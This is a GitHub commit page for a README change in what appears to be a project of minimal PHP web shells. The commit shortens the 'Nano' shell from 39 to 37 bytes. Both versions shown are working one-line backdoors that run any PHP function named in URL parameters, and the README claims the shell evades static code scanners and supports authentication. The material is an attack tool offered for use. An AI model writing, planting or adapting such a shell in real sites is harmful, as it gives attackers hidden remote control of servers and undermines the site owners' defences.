Skip to content

Commit

Permalink
Shortened nano to 37 bytest, Resolves #4
Browse files Browse the repository at this point in the history
  • Loading branch information
s0md3v authored Jul 10, 2018
1 parent 5a1bd6b commit 51b5053
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -7,10 +7,10 @@ For example, if short tags are disabled, you will need to replace <? with <?php.

### Nano
```php
<?$x=$_GET;($x[p]=='_'?$x[f]($x[c]):y);
<?$x=$_GET;$x[p]=='_'&&$x[f]($x[c]);
```
#### Features
- 39 bytes in size
- 37 bytes in size
- Can't be detected by static code scanners
- Supports authentication
Expand Down

0 comments on commit 51b5053

Please sign in to comment.